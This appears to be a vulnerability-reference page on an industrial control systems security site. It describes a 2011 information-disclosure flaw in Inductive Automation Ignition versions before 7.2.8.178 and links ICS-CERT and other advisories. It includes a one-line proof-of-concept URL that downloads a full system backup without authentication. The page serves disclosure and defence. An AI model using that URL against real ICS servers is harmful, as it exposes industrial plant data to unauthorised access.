Home -> Resources -> SCADA/ICS Vulnerability Reference -> Inductive Automation Ignition

Inductive Automation Ignition Information Disclosure Vulnerability

August 19, 2011

Ignition is prone to an information-disclosure vulnerability.

Exploiting this issue could allow an attacker to gain access to potentially sensitive information. Information obtained may aid in further attacks.

Versions prior to Ignition 7.2.8.178 are vulnerable.

ICS-CERT Advisories / Alerts

ICSA-11-231-01

Vendor Website (include Patches / Hotfixes)

Ignition Product Homepage
Free Trial Download

Exploit Proof-of-Concept

The following was provided compliments of Ruben Santamarta -
Using a compatible brower, enter the following URL without authenticating against the server:
http://[server ip address]/main/system/backup/full

Common Vulnerability & Exposure (CVE) References

Not available at this time.

Additional Information

Disclosure: Ruben Santamarta via ICS-CERT
Secunia Advisory #45896
Security Focus Vulnerability Info and Exploit Bugtraq ID 49447

SCADAhacker .com

Think like a hacker...
to secure industrial control systems.

Inductive Automation Ignition Information Disclosure Vulnerability

ICS-CERT Advisories / Alerts

Vendor Website (include Patches / Hotfixes)

Exploit Proof-of-Concept

Common Vulnerability & Exposure (CVE) References

Additional Information

SCADAhacker.com

Think like a hacker... to secure industrial control systems.

Inductive Automation Ignition Information Disclosure Vulnerability

ICS-CERT Advisories / Alerts

Vendor Website (include Patches / Hotfixes)

Exploit Proof-of-Concept

Common Vulnerability & Exposure (CVE) References

Additional Information

SCADAhacker .com

Think like a hacker...
to secure industrial control systems.